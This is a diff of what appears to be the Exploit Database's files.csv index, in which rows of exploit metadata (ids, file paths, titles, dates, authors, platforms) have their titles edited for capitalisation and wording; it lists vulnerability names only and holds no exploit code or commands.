+23036,platforms/php/webapps/23036.txt,"MatrikzGB Guestbook 2.0 - Administrative Privilege Escalation",2003-08-16,"Stephan Sattler",php,webapps,0 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 22881,platforms/php/webapps/22881.txt,"PHP Server Monitor - Persistent Cross-Site Scripting",2012-11-21,loneferret,php,webapps,0 22882,platforms/windows/local/22882.c,"Microsoft Windows 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0 @@ -20158,7 +20159,7 @@ id,file,description,date,author,platform,type,port 22942,platforms/php/webapps/22942.txt,"WebCalendar 0.9.x - Local File Inclusion Information Disclosure",2003-07-21,noconflic,php,webapps,0 22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - Home Environment Variable Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22944,platforms/windows/remote/22944.txt,"Savant Web Server 3.1 - CGITest.HTML Cross-Site Scripting",2003-07-21,dr_insane,windows,remote,0 -22945,platforms/windows/dos/22945.txt,"Savant Webserver 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos,0 +22945,platforms/windows/dos/22945.txt,"Savant WebServer 3.1 - Denial of Service",2003-07-21,dr_insane,windows,dos,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 22947,platforms/hardware/dos/22947.c,"3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service",2003-07-21,"David F.Madrid",hardware,dos,0 22948,platforms/php/webapps/22948.txt,"MoreGroupWare 0.6.8 - WEBMAIL2_INC_DIR Remote File Inclusion",2003-07-21,"phil dunn",php,webapps,0 @@ -20198,7 +20199,7 @@ id,file,description,date,author,platform,type,port 22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x - Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 23006,platforms/php/remote/23006.rb,"Network Shutdown Module 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 -23007,platforms/windows/local/23007.rb,"Windows - AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 +23007,platforms/windows/local/23007.rb,"Microsoft Windows - AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 - Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 - Full Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,php,webapps,0 @@ -20209,7 +20210,7 @@ id,file,description,date,author,platform,type,port 23015,platforms/php/webapps/23015.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 fatcat Module - fatcat_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 23016,platforms/php/webapps/23016.txt,"phpWebSite 0.7.3/0.8.2/0.8.3/0.9.2 - pagemaster Module PAGE_id Parameter Cross-Site Scripting",2003-08-11,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22935,platforms/multiple/dos/22935.txt,"Websense Proxy - Filter Bypass",2012-11-26,"Nahuel Grisolia",multiple,dos,0 -22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx parameter' SQL Injection",2012-11-26,NoGe,php,webapps,0 +22936,platforms/php/webapps/22936.txt,"SmartCMS - 'index.php idx Parameter' SQL Injection",2012-11-26,NoGe,php,webapps,0 22937,platforms/php/webapps/22937.txt,"PRADO PHP Framework 3.2.0 - Arbitrary File Read",2012-11-26,LiquidWorm,php,webapps,0 22960,platforms/php/webapps/22960.txt,"PBLang 4.0/4.56 Bulletin Board System - IMG Tag HTML Injection",2003-07-28,"Quan Van Truong",php,webapps,0 22938,platforms/linux/dos/22938.py,"mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)",2012-11-26,_ishikawa,linux,dos,0 @@ -20225,7 +20226,7 @@ id,file,description,date,author,platform,type,port 22976,platforms/freebsd/remote/22976.pl,"FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0 22977,platforms/php/webapps/22977.txt,"MOD Guthabenhack 1.3 For Woltlab Burning Board - SQL Injection",2003-07-31,ben.moeckel@badwebmasters.net,php,webapps,0 22978,platforms/hardware/dos/22978.txt,"Cisco IOS 10/11/12 - UDP Echo Service Memory Disclosure",2003-08-01,FX,hardware,dos,0 -22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File Manipulation",2003-08-01,"Secure Network Operations",linux,local,0 +22979,platforms/linux/local/22979.txt,"CDRTools 2.0 - RSCSI Debug File Arbitrary Local File manipulation",2003-08-01,"Secure Network Operations",linux,local,0 22980,platforms/windows/local/22980.asm,"Symantec Norton AntiVirus 2002/2003 - Device Driver Memory Overwrite",2003-08-02,"Lord Yup",windows,local,0 22981,platforms/linux/dos/22981.c,"Postfix 1.1.x - Denial of Service (1)",2003-08-04,r3b00t,linux,dos,0 22982,platforms/linux/dos/22982.pl,"Postfix 1.1.x - Denial of Service (2)",2003-08-04,daniels@legend.co.uk,linux,dos,0 @@ -20262,17 +20263,17 @@ id,file,description,date,author,platform,type,port 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d - User.cgi Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x - BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x - HTMLtags.php Local File Inclusion",2003-08-13,"Virginity Security",php,webapps,0 -23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id parameter) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 -23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem parameter' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 +23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id Parameter) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 +23029,platforms/php/webapps/23029.txt,"SmartCMS - 'index.php menuitem Parameter' SQL Injection / Cross-Site Scripting",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET - name Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET - topic title Cross-Site Scripting",2003-08-13,G00db0y,asp,webapps,0 -23031,platforms/php/webapps/23031.txt,"silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 +23031,platforms/php/webapps/23031.txt,"Silverstripe CMS 3.0.2 - Multiple Vulnerabilities",2012-11-30,"Sense of Security",php,webapps,0 23038,platforms/windows/remote/23038.c,"eMule 0.2x Client - OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote,0 23039,platforms/php/webapps/23039.txt,"Fusion News 3.3 - Unauthorized Account Addition",2003-08-18,DarkKnight,php,webapps,0 -23040,platforms/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double Free",2003-09-01,"Stefan Esser",windows,remote,0 +23040,platforms/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double-Free",2003-09-01,"Stefan Esser",windows,remote,0 23041,platforms/windows/local/23041.txt,"DeskSoft CheckMail 1.2 - Password Disclosure",2003-08-19,"cyber talon",windows,local,0 23042,platforms/windows/dos/23042.pl,"Cerberus FTPServer 1.71/2.1/2.32 - Remote Denial of Service",2003-08-20,"real Remoter",windows,dos,0 -23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - .SMIL File Script Execution",2003-08-19,KrazySnake,windows,remote,0 +23043,platforms/windows/remote/23043.txt,"RealOne Player 1.0/2.0/6.0.10/6.0.11 - '.SMIL' File Script Execution",2003-08-19,KrazySnake,windows,remote,0 23044,platforms/windows/remote/23044.txt,"Microsoft Internet Explorer 5/6 - Object Type Validation",2003-08-20,"Drew Copley",windows,remote,0 23045,platforms/linux/dos/23045.pl,"ViRobot Linux Server 2.0 - Exploit",2003-08-20,kf,linux,dos,0 23046,platforms/openbsd/local/23046.c,"OpenBSD 3.3 - Semget() Integer Overflow (1)",2003-08-20,blexim,openbsd,local,0 @@ -20297,9 +20298,9 @@ id,file,description,date,author,platform,type,port 23065,platforms/php/webapps/23065.txt,"AldWeb MiniPortail 1.9/2.x - LNG Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 23066,platforms/windows/remote/23066.pl,"Tellurian TftpdNT 1.8/2.0 - Long Filename Buffer Overrun",2003-08-27,storm,windows,remote,0 23067,platforms/php/webapps/23067.txt,"eNdonesia 8.2/8.3 - Mod Parameter Cross-Site Scripting",2003-08-27,"Bahaa Naamneh",php,webapps,0 -23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal file disclosure",2003-08-30,sickle,windows,remote,0 +23068,platforms/windows/remote/23068.txt,"file sharing for net 1.5 - Directory Traversal",2003-08-30,sickle,windows,remote,0 23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 -23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal file disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0 +23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",multiple,remote,0 23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0 23072,platforms/php/webapps/23072.txt,"Ezboard - 'invitefriends.php3' Cross-Site Scripting",2003-09-01,"David F. Madrid",php,webapps,0 23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 - 'MySQLJackpot' Windows Remote Root",2012-12-02,kingcope,windows,remote,0 @@ -20310,11 +20311,11 @@ id,file,description,date,author,platform,type,port 23078,platforms/linux/dos/23078.txt,"MySQL - Denial of Service (PoC)",2012-12-02,kingcope,linux,dos,0 23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 23080,platforms/windows/remote/23080.txt,"FreeSSHD 2.1.3 - Remote Authentication Bypass Exploit",2012-12-02,kingcope,windows,remote,0 -23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authenticated User Enumeration",2012-12-02,kingcope,multiple,remote,0 +23081,platforms/multiple/remote/23081.pl,"MySQL - Remote Pre-Authentication User Enumeration",2012-12-02,kingcope,multiple,remote,0 23082,platforms/linux/remote/23082.txt,"(SSH.com Communications) SSH Tectia (SSH < 2.0-6.1.9.95 / Tectia 6.1.9.95) - Authentication Bypass Remote Exploit",2012-12-02,kingcope,linux,remote,0 23083,platforms/windows/remote/23083.txt,"MySQL - Windows Remote System Level Exploit (Stuxnet technique)",2012-12-02,kingcope,windows,remote,0 23084,platforms/php/webapps/23084.txt,"TSguestbook 2.1 - Message Field HTML Injection",2003-09-01,Trash-80,php,webapps,0 -23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal File Disclosure",2003-09-01,"Zero X",cgi,webapps,0 +23085,platforms/cgi/webapps/23085.html,"Sitebuilder 1.4 - 'sitebuilder.cgi' Directory Traversal",2003-09-01,"Zero X",cgi,webapps,0 23086,platforms/windows/dos/23086.txt,"Yahoo! Messenger 4.0/5.0 - Remote Denial of Service",2003-09-01,diman,windows,dos,0 23087,platforms/hardware/dos/23087.c,"Check Point Firewall-1 4.x - SecuRemote Internal Interface Address Information Leakage",2001-07-17,"Jim Becher",hardware,dos,0 23088,platforms/windows/dos/23088.pl,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service (1)",2003-09-02,_6mO_HaCk,windows,dos,0 @@ -20347,7 +20348,7 @@ id,file,description,date,author,platform,type,port 23117,platforms/windows/dos/23117.txt,"FTP Desktop 3.5 - Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 23118,platforms/windows/dos/23118.txt,"FTP Desktop 3.5 - FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 23119,platforms/linux/local/23119.c,"Apache::Gallery 0.4/0.5/0.6 - Insecure Local File Storage Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 -23120,platforms/asp/webapps/23120.txt,"ICQ 2003 - Webfront guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",asp,webapps,0 +23120,platforms/asp/webapps/23120.txt,"ICQ 2003 - Webfront Guestbook Cross-Site Scripting",2003-09-08,"Donnie Werner",asp,webapps,0 23121,platforms/windows/remote/23121.txt,"Kukol E.V. HTTP & FTP Server Suite 6.2 - File Disclosure",2003-09-08,euronymous,windows,remote,0 23122,platforms/windows/remote/23122.txt,"Microsoft Internet Explorer 5 - XML Page Object Type Validation",2003-09-08,http-equiv,windows,remote,0 23123,platforms/windows/remote/23123.pl,"Roger Wilco 1.4.1 - Remote Server Side Buffer Overrun",2003-09-08,D4rkGr3y,windows,remote,0 @@ -20356,14 +20357,14 @@ id,file,description,date,author,platform,type,port 23126,platforms/linux/local/23126.c,"RealOne Player for Linux 2.2 Alpha - Insecure Configuration File Permission Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 23127,platforms/cgi/webapps/23127.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Cross-Site Scripting",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 23128,platforms/cgi/webapps/23128.txt,"Escapade 0.2.1 Beta Scripting Engine - PAGE Parameter Full Path Disclosure",2003-09-09,"Bahaa Naamneh",cgi,webapps,0 -23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x - 'index.php' Showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps,0 +23129,platforms/php/webapps/23129.txt,"Invision Power Board 1.x - 'index.php' showtopic Cross-Site Scripting",2003-09-09,"Boy Bear",php,webapps,0 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 -23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 +23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6 - Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal",2012-12-04,Nin3,windows,webapps,0 23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 - Custom App Remote Code Execution",2012-12-09,Metasploit,multiple,remote,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 - WebAdmin Interface Information Disclosure",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 -23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 +23137,platforms/multiple/remote/23137.txt,"Cacheflow CacheOS 4.1.10016 - HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - cgi-lib.dll Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0 23140,platforms/php/webapps/23140.txt,"vbPortal 2.0 alpha 8.1 - Authentication SQL Injection",2003-09-12,frog,php,webapps,0 @@ -20374,7 +20375,7 @@ id,file,description,date,author,platform,type,port 23145,platforms/windows/dos/23145.c,"Ipswitch Imail Server 5.0 - SMTP HELO Argument Buffer Overflow",1998-03-10,Rootshell,windows,dos,0 23146,platforms/windows/dos/23146.c,"Alt-N MDaemon Server 2.71 SP1 - SMTP HELO Argument Buffer Overflow",1999-03-10,Rootshell,windows,dos,0 23147,platforms/windows/remote/23147.txt,"Nokia Electronic Documentation 5.0 - Directory Disclosure",2003-09-15,@stake,windows,remote,0 -23148,platforms/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 - Connection Redirection",2003-09-15,@stake,windows,remote,0 +23148,platforms/windows/remote/23148.txt,"Nokia Electronic Documentation 5.0 - Connection redirection",2003-09-15,@stake,windows,remote,0 23149,platforms/windows/remote/23149.txt,"Nokia Electronic Documentation 5.0 - Cross-Site Scripting",2003-09-15,"Ollie Whitehouse",windows,remote,0 23150,platforms/windows/dos/23150.c,"ChatZilla 0.8.23 - Remote Denial of Service Attack",2003-09-15,D4rkGr3y,windows,dos,0 23151,platforms/linux/remote/23151.c,"Liquid War 5.4.5/5.5.6 - HOME Environment Variable Buffer Overflow",2003-09-16,"Angelo Rosiello",linux,remote,0 @@ -20427,19 +20428,19 @@ id,file,description,date,author,platform,type,port 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0 23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 - IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos,0 -23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash (PoC)",2012-12-07,coolkaveh,windows,dos,0 +23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - '.swf' Crash (PoC)",2012-12-07,coolkaveh,windows,dos,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 23203,platforms/windows/remote/23203.rb,"IBM System Director Agent - DLL Injection",2012-12-07,Metasploit,windows,remote,0 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun",2003-09-30,demz,linux,local,0 -23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 - advertiser.php password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 +23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 - advertiser.php Password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 - lostpassword.php email Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23207,platforms/php/webapps/23207.txt,"Atrise Everyfind 5.0.2 - search Cross-Site Scripting",2003-10-01,Ezhilan,php,webapps,0 -23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal information disclosure",2003-10-01,"Gama Sec",php,webapps,0 +23208,platforms/php/webapps/23208.txt,"mpnews pro 2.1.0.18 - Directory Traversal Information Disclosure",2003-10-01,"Gama Sec",php,webapps,0 23209,platforms/windows/remote/23209.txt,"mutant penguin mpweb pro 1.1.2 - Directory Traversal",2003-10-01,"GamaSec Security",windows,remote,0 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 - PostThreadMessage() Arbitrary Process Killing",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP - Password Disclosure",2003-10-03,"Cisco Security",hardware,remote,0 -23213,platforms/php/webapps/23213.txt,"Wordpress 0.6/0.7 - Blog.header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 +23213,platforms/php/webapps/23213.txt,"WordPress 0.6/0.7 - Blog.header.php SQL Injection",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 - Message.cgi Cross-Site Scripting",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 - Absolute Position Block Denial of Service",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 - Malformed Document Denial of Service",2003-10-03,"Bahaa Naamneh",windows,dos,0 @@ -20451,7 +20452,7 @@ id,file,description,date,author,platform,type,port 23222,platforms/windows/remote/23222.txt,"Easy File Sharing Web Server 1.2 - Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote,0 23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 - SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 23225,platforms/windows/remote/23225.rb,"Maxthon3 - about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 -23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server - Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 +23226,platforms/windows/remote/23226.rb,"Freefloat FTP Server - Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component - Command Injection",2012-12-09,Metasploit,unix,remote,0 23228,platforms/linux/local/23228.c,"SLocate 2.6 - User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 - Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 @@ -20478,7 +20479,7 @@ id,file,description,date,author,platform,type,port 23250,platforms/hardware/webapps/23250.txt,"Cisco DPC2420 - Multiples Vulnerabilities",2012-12-09,"Facundo M. de la Cruz",hardware,webapps,0 23404,platforms/multiple/remote/23404.c,"Applied Watch Command Center 1.0 - Authentication Bypass (1)",2003-11-28,"Bugtraq Security",multiple,remote,0 23251,platforms/linux/local/23251.txt,"Centrify Deployment Manager 2.1.0.283 - Privilege Escalation",2012-12-09,"Larry W. Cashdollar",linux,local,0 -23252,platforms/php/webapps/23252.txt,"ClipBucket 2.6 Revision 738 - Multiple SQL Injections",2012-12-09,"High-Tech Bridge SA",php,webapps,0 +23252,platforms/php/webapps/23252.txt,"Clipbucket 2.6 Revision 738 - Multiple SQL Injections",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23253,platforms/php/webapps/23253.txt,"Achievo 1.4.5 - Multiple Vulnerabilities (2)",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control - User32.dll Function Buffer Overrun",2003-10-15,"Brett Moore",windows,local,0 @@ -20493,13 +20494,13 @@ id,file,description,date,author,platform,type,port 23264,platforms/php/webapps/23264.txt,"DeskPro 1.1 - Multiple SQL Injections",2003-10-20,"Aviram Jenik",php,webapps,0 23265,platforms/windows/remote/23265.txt,"Sun Java Plugin 1.4.2 _01 - Cross-Site Applet Sandbox Security Model Violation",2003-10-20,"Marc Schoenefeld",windows,remote,0 23266,platforms/cgi/webapps/23266.txt,"Dansie Shopping Cart - Server Error Message Installation Full Path Disclosure",2003-10-20,Dr`Ponidi,cgi,webapps,0 -23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur Mailserver 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 +23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0 23268,platforms/java/webapps/23268.txt,"Vivisimo Clustering Engine - Search Script Cross-Site Scripting",2003-10-21,ComSec,java,webapps,0 23269,platforms/php/webapps/23269.txt,"FuzzyMonkey 2.11 - MyClassifieds Email Variable SQL Injection",2003-10-21,Ezhilan,php,webapps,0 23270,platforms/windows/remote/23270.java,"Sun Java Plugin 1.4 - Unauthorized Java Applet Floppy Access",2003-10-21,"Marc Schoenefeld",windows,remote,0 23271,platforms/multiple/remote/23271.txt,"PSCS VPOP3 2.0 Email Server WebAdmin - Cross-Site Scripting",2003-10-22,SecuriTeam,multiple,remote,0 23272,platforms/solaris/remote/23272.txt,"Sun Management Center 3.0/3.5 - Error Message Information Disclosure",2003-10-22,"Jon Hart",solaris,remote,0 -23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6.0 - Scrollbar-Base-Color Partial Denial of Service",2003-10-22,"Andreas Boeckler",windows,dos,0 +23273,platforms/windows/dos/23273.html,"Microsoft Internet Explorer 6 - Scrollbar-Base-Color Partial Denial of Service",2003-10-22,"Andreas Boeckler",windows,dos,0 23274,platforms/linux/dos/23274.pl,"Coreutils 4.5.x - LS Width Argument Integer Overflow",2003-10-22,druid,linux,dos,0 23275,platforms/cgi/webapps/23275.txt,"DansGuardian 2.2.x - Denied URL Cross-Site Scripting",2003-10-22,"Richard Maudsley",cgi,webapps,0 23276,platforms/multiple/dos/23276.java,"Sun Java Virtual Machine 1.x - Slash Path Security Model Circumvention",2003-10-22,"Last Stage of Delirium",multiple,dos,0 @@ -20509,19 +20510,19 @@ id,file,description,date,author,platform,type,port 23279,platforms/windows/dos/23279.txt,"DIMIN Viewer 5.4.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23280,platforms/windows/dos/23280.txt,"FreeVimager 4.1.0 - Crash (PoC)",2012-12-10,"Jean Pascal Pereira",windows,dos,0 23282,platforms/multiple/remote/23282.txt,"Apache cocoon 2.14/2.2 - Directory Traversal",2003-10-24,"Thierry De Leeuw",multiple,remote,0 -23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6.0 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote,0 +23283,platforms/windows/remote/23283.txt,"Microsoft Internet Explorer 6 - Local Resource Reference",2003-10-24,Mindwarper,windows,remote,0 23284,platforms/php/webapps/23284.txt,"MyBB Bank- 3 Plugin - SQL Injection",2012-12-11,Red_Hat,php,webapps,0 23314,platforms/multiple/dos/23314.c,"Serious Sam Engine 1.0.5 - Remote Denial of Service",2003-10-30,"Luigi Auriemma",multiple,dos,0 23286,platforms/php/webapps/23286.txt,"Joomla JooProperty 1.13.0 - Multiple Vulnerabilities",2012-12-11,D4NB4R,php,webapps,0 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 -23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 - IMXCF.dll Plugin Code Execution",2012-12-11,beford,windows,dos,0 +23288,platforms/windows/dos/23288.txt,"Irfanview 4.33 - IMXCF.dll Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - Cross-Site Request Forgery",2012-12-11,sajith,php,webapps,0 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0 -23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0 +23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums - Multiple Fields HTML Injection",2003-10-30,ProXy,php,webapps,0 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x - Security Manager Denial of Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0 23293,platforms/windows/dos/23293.txt,"Yahoo! Messenger 5.6 - File Transfer Buffer Overrun",2003-10-27,"Hat-Squad Security Team",windows,dos,0 -23294,platforms/php/webapps/23294.txt,"Chi Kien Uong GuestBook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps,0 +23294,platforms/php/webapps/23294.txt,"Chi Kien Uong Guestbook 1.51 - Cross-Site Scripting",2003-10-27,"Joshua P. Miller",php,webapps,0 23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote,0 23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23297,platforms/linux/local/23297.c,"Musicqueue 1.2 - SIGSEGV Signal Handler Insecure File Creation",2003-10-27,"dong-h0un U",linux,local,0 @@ -20549,15 +20550,15 @@ id,file,description,date,author,platform,type,port 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6 < 10 - Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 23322,platforms/php/webapps/23322.txt,"TipsOfTheDay 